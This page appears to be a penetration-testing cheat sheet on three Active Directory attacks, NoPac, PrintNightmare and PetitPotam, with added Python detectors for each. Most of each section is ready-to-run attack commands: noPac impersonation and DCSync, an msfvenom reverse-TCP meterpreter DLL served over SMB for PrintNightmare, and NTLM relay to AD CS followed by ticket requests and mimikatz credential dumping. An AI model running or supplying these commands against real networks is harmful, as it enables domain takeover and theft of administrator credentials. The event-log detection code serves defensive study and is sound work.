Bleeding Edge Vulnerabilities
NoPac (SamAccountName Spoofing)
NoPac (SamAccountName Spoofing) is a privilege escalation attack that exploits two vulnerabilities (CVE-2021-42287 and CVE-2021-42278) in Active Directory. It allows an attacker with low privileges to impersonate a domain administrator by abusing the way Active Directory handles Kerberos tickets (TGT and ST).
By combining these flaws, an attacker can:
- Rename a machine account to match an existing domain admin account.
- Request a Kerberos TGT that AD incorrectly associates with the real admin.
- Use the forged TGT to gain domain admin access.
This attack bypasses normal privilege escalation defenses, making it critical to patch affected systems.
```bash
git clone https://github.com/Ridter/noPac.git
cd noPac

## Scanning for NoPac
sudo python3 scanner.py rezydev.local/jethalal:Coolpass123@ -dc-ip 10.10.10.10 -use-ldap

## Shell & Impersonating
sudo python3 noPac.py REZYDEV.LOCAL/jethalal:Coolpass123@ -dc-ip 10.10.10.10 -dc-host <DC-HOSTNAME> -shell --impersonate administrator -use-ldap

## DCSync
sudo python3 noPac.py REZYDEV.LOCAL/jethalal:Coolpass123@ -dc-ip 10.10.10.10 -dc-host <DC-HOSTNAME> --impersonate administrator -use-ldap -dump -just-dc-user REZYDEV/administrator
```
A shell is established on the target using smbexec.py; this is a semi-interactive shell session.
The .ccache file is saved in the current directory (the one from which we ran the noPac.py tool).
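A defender-side counterpart to the sAMAccountName trick above, as an added example that is not part of noPac: a small Python detector over Windows Security events 4741 and 4742. The event field names and the DC_NAMES / PROVISIONING_ACCOUNTS inventory are constructed assumptions for this page's lab domain.

```python
"""Added detection example (not part of the noPac tool): flag the sAMAccountName
manipulation behind NoPac in Windows Security events 4741 and 4742.
Events are constructed dicts: 'old_sam' is the 4742 target 'Account Name'
(pre-change), 'new_sam' the 'SAM Account Name' under 'Changed Attributes'.
DC_NAMES and PROVISIONING_ACCOUNTS are assumed inventory for this page's lab."""
from dataclasses import dataclass

DC_NAMES = {"DC01"}                   # DC hostnames without the trailing '$'
PROVISIONING_ACCOUNTS = {"svc_sccm"}  # accounts expected to create computers

@dataclass(frozen=True)
class Alert:
    rule: str
    event_id: int
    account: str
    actor: str

def inspect_event(ev: dict) -> list:
    """Return zero or more Alerts for one 4741/4742 event."""
    alerts = []
    if ev["event_id"] == 4741 and ev["actor"] not in PROVISIONING_ACCOUNTS:
        # MachineAccountQuota abuse: an ordinary user created a computer object.
        alerts.append(Alert("computer account created by non-provisioning user",
                            4741, ev["new_sam"], ev["actor"]))
    elif ev["event_id"] == 4742:
        old, new = ev["old_sam"], ev["new_sam"]
        if old.endswith("$") and not new.endswith("$"):
            # The NoPac pivot: a computer account that no longer looks like one.
            alerts.append(Alert("computer account lost its '$' suffix",
                                4742, new, ev["actor"]))
        if new.rstrip("$").upper() in DC_NAMES and old.rstrip("$").upper() not in DC_NAMES:
            alerts.append(Alert("computer account renamed to a DC name",
                                4742, new, ev["actor"]))
    return alerts

def scan(events) -> list:
    return [a for ev in events for a in inspect_event(ev)]

# Constructed sample stream: MAQ join, NoPac rename, rename back, benign rename.
SAMPLE_EVENTS = [
    {"event_id": 4741, "actor": "jethalal", "new_sam": "WIN-JETHA$"},
    {"event_id": 4742, "actor": "jethalal", "old_sam": "WIN-JETHA$", "new_sam": "DC01"},
    {"event_id": 4742, "actor": "jethalal", "old_sam": "DC01", "new_sam": "WIN-JETHA$"},
    {"event_id": 4742, "actor": "svc_sccm", "old_sam": "SRV01$", "new_sam": "SRV02$"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

On a patched DC the rename is refused and logged under the new Directory Service events; on an unpatched one, the 4742 with a dropped '$' is the alert worth paging on.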
PrintNightmare (remotely)
PrintNightmare is a critical Windows vulnerability (CVE-2021-34527) in the Windows Print Spooler service that allows remote code execution (RCE) and local privilege escalation (LPE).
How It Works:
- The Print Spooler service improperly handles printer driver installation via Point and Print.
- Attackers can exploit this by tricking Windows into installing a malicious driver.
- This gives them SYSTEM privileges, allowing full control over the target machine.
Impact:
- Can be exploited remotely or locally.
- Used for privilege escalation to gain admin rights.
- Enables remote takeover of domain controllers.
```bash
# Clone Exploit Repo
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

# Install cube0x0's Version of Impacket [MUST]
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

# Enumerate MS-RPRN
python3 rpcdump.py @10.10.10.10 | egrep 'MS-RPRN|MS-PAR'

# Generating a DLL Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=8080 -f dll > file.dll

# Creating a Share with smbserver.py to host .dll file
sudo smbserver.py -smb2support REZYDEV /path/to/file.dll

# Configuring & Starting MSF multi/handler
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.10.5; set LPORT 8080; run"

# Run The Exploit
sudo python3 CVE-2021-1675.py rezydev.local/jethalal:'Coolpass123@'@10.10.10.10 '\\10.10.10.5\REZYDEV\file.dll'
```
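The driver-install path described above, seen from the detection side (an added example, not code from the CVE-2021-1675 repo): a Python triage of Microsoft-Windows-PrintService/Operational events 316 (driver added or updated) and 808 (plug-in failed to load). The message layouts are constructed approximations of the real log text, and TRUSTED_DRIVER_ROOT is an assumed site policy.

```python
"""Added detection example (not from the exploit repo): triage entries of the
Microsoft-Windows-PrintService/Operational log for PrintNightmare-style driver
installs. Event 316 logs a driver add/update with its file list; event 808 logs a
spooler plug-in that failed to load. Message layouts here are constructed
approximations of the real log text; TRUSTED_DRIVER_ROOT is an assumed policy."""
import re

TRUSTED_DRIVER_ROOT = "c:\\windows\\system32\\spool\\drivers\\"
UNC_PATH = re.compile(r"^\\\\[^\\\s]+\\")              # \\host\share\...
FILES_FIELD = re.compile(r"Files:-\s*(.*?)\.\s*No user action", re.S)
MODULE_FIELD = re.compile(r"plug-in module\s+(\S+?),")

def suspicious_paths(files_text: str) -> list:
    """Keep entries of the 'Files:-' list that are UNC or outside the spool tree."""
    hits = []
    for path in (p.strip() for p in files_text.split(",") if p.strip()):
        low = path.lower()
        if UNC_PATH.match(path) or (":" in low and not low.startswith(TRUSTED_DRIVER_ROOT)):
            hits.append(path)
    return hits

def triage(ev: dict) -> list:
    """Return findings (strings) for one PrintService/Operational event."""
    msg = ev["message"]
    if ev["event_id"] == 316:
        m = FILES_FIELD.search(msg)
        files = suspicious_paths(m.group(1)) if m else []
        return [f"driver file loaded from untrusted location: {p}" for p in files]
    if ev["event_id"] == 808:
        m = MODULE_FIELD.search(msg)
        module = m.group(1) if m else ""
        # The exploit's DLL is typically staged under ...\3\old\<n>\ before loading.
        if UNC_PATH.match(module) or "\\old\\" in module.lower():
            return [f"spooler plug-in failed to load from staged path: {module}"]
    return []

# Constructed sample events: benign driver update, remote UNC driver, staged DLL.
SAMPLE_EVENTS = [
    {"event_id": 316, "message": "Printer driver HP Universal for Windows x64 "
     "Version-3 was added or updated. Files:- hpcpp.dll, hpcui.dll. No user action is required."},
    {"event_id": 316, "message": "Printer driver 1234 for Windows x64 Version-3 was added or "
     "updated. Files:- \\\\10.10.10.5\\REZYDEV\\file.dll. No user action is required."},
    {"event_id": 808, "message": "The print spooler failed to load a plug-in module "
     "C:\\Windows\\System32\\spool\\DRIVERS\\x64\\3\\old\\1\\file.dll, error code 0x45A."},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["event_id"], triage(ev))
```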
PetitPotam (MS-EFSRPC)
PetitPotam (CVE-2021-36942) is an NTLM relay attack that abuses MS-EFSRPC (Encrypting File System Remote Protocol) to force a Windows server or domain controller to authenticate to an attacker's machine using NTLM.
How It Works:
- The attacker sends EFSRPC requests to a Windows system.
- The target system authenticates to the attacker's machine over NTLM.
- The attacker relays this NTLM authentication to another service (e.g., Active Directory Certificate Services).
- This can lead to privilege escalation or domain compromise (e.g., issuing admin certificates).
Impact:
- Can be used to take over a domain if combined with an NTLM relay attack.
- Works even if SMB signing is enabled.
- Often exploited with ADCS (Active Directory Certificate Services) misconfigurations.
```bash
# Start ntlmrelayx.py
python3 ntlmrelayx.py -debug -smb2support --target http://CA01.REZYDEV.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
## Note: We can either use KerberosAuthentication or DomainController ADCS template.
## Web Enrollment URL for the CA host is also needed.

# Using Certi to Locate the CA
certi find -dc-ip 10.10.10.10 -u rezydev -p Coolpass123@

# Using CrackmapExec to Locate the CA
crackmapexec ldap 10.10.10.10 -u rezydev -p Coolpass123@ --kdcHost <DC_Hostname> --ads

# Using BloodHound to Locate the CA
sharpHound.exe --collectionmethods ACL,DCOnly,Certipy

# Using LDAP Queries (PowerShell) to Locate the CA
Get-ADObject -Filter 'objectclass -eq "pKIEnrollmentService"' -Properties dnsHostName, cn

python3 PetitPotam.py 10.10.10.5 10.10.10.10 # Force DC to auth to Attacker
## OR IF WINDOWS-ATTACK-HOST USE MIMIKATZ INSTEAD
misc::efs /server:10.10.10.10 /connect:10.10.10.5
```
Now we get a base64-encoded certificate for the DC.
```bash
# Requesting a TGT Using gettgtpkinit.py
python3 gettgtpkinit.py REZYDEV.LOCAL/DC01\$ -pfx-base64 <BASE64-ENCODED-CERT> dc01.ccache

# Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=dc01.ccache

# Using Domain Controller TGT to DCSync
python3 secretsdump.py -just-dc-user REZYDEV/administrator -k -no-pass DC01.REZYDEV.LOCAL

# Submitting a TGS Request for Ourselves Using getnthash.py
python getnthash.py -key <KEY> REZYDEV.LOCAL/DC01$
# Key is 'minikerberos INFO' from gettgtpkinit.py output from above code block
# It will recover a NT Hash, and we can use that hash to DCSync
python3 secretsdump.py -just-dc-user REZYDEV/administrator "DC01$"@10.10.10.10 -hashes <HASH>:<HASH>
```

```powershell
# We could directly use base64 certificate to request TGT and perform PTT
.\Rubeus.exe asktgt /user:DC01$ /certificate:<BASE64-CERT> /ptt
# Confirm ticket is in the memory using 'klist'

# Perform DCSync using Mimikatz
.\mimikatz.exe
mimikatz> lsadump::dcsync /user:rezydev\krbtgt
```
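An added detection example for the coercion-and-relay chain above (not part of PetitPotam, ntlmrelayx or the other tools listed): flag a relayed machine-account logon on the relay target, here the AD CS web enrollment host, from Security event 4624. HOST_INVENTORY and the sample events are constructed for this page's lab domain.

```python
"""Added detection example (not part of PetitPotam or ntlmrelayx): spot a relayed
machine-account logon on the relay target. Coercion plus relay shows up on the
AD CS web enrollment host as Security event 4624, logon type 3, authentication
package NTLM, for an account ending in '$', from a source IP that does not belong
to the computer owning that account. HOST_INVENTORY and the events are constructed."""
from dataclasses import dataclass

HOST_INVENTORY = {"DC01$": {"10.10.10.10"}}   # machine account -> its known IPs
LOCAL_SOURCES = {"-", "::1", "127.0.0.1"}     # local logons carry no useful source

@dataclass(frozen=True)
class Finding:
    account: str
    source_ip: str
    reason: str

def check_logon(ev: dict):
    """Return a Finding if the 4624 looks like a relayed machine-account logon."""
    if ev["event_id"] != 4624 or ev["logon_type"] != 3:
        return None
    if not ev["auth_package"].upper().startswith("NTLM"):   # NTLM, NTLM V1, NTLM V2
        return None                                          # Kerberos logons are not relayed this way
    account, src = ev["account"], ev["source_ip"]
    if not account.endswith("$") or src in LOCAL_SOURCES:
        return None
    known = HOST_INVENTORY.get(account)
    if known is None:
        return Finding(account, src, "network NTLM logon by unknown machine account")
    if src not in known:
        return Finding(account, src, "machine account authenticated from a foreign IP")
    return None

def scan(events) -> list:
    return [f for f in (check_logon(ev) for ev in events) if f is not None]

# Constructed sample events as seen on CA01: normal DC logon, relayed DC01$ from
# the attacker host on this page, a Kerberos logon, and an ordinary user logon.
SAMPLE_EVENTS = [
    {"event_id": 4624, "logon_type": 3, "auth_package": "NTLM", "account": "DC01$", "source_ip": "10.10.10.10"},
    {"event_id": 4624, "logon_type": 3, "auth_package": "NTLM", "account": "DC01$", "source_ip": "10.10.10.5"},
    {"event_id": 4624, "logon_type": 3, "auth_package": "Kerberos", "account": "DC01$", "source_ip": "10.10.10.5"},
    {"event_id": 4624, "logon_type": 3, "auth_package": "NTLM", "account": "jethalal", "source_ip": "10.10.10.50"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The same rule applied on the CA's IIS logs catches the relay even when SMB signing is enforced, because the coerced authentication lands on HTTP, which is exactly why the mitigation is EPA / disabling NTLM on web enrollment rather than SMB signing.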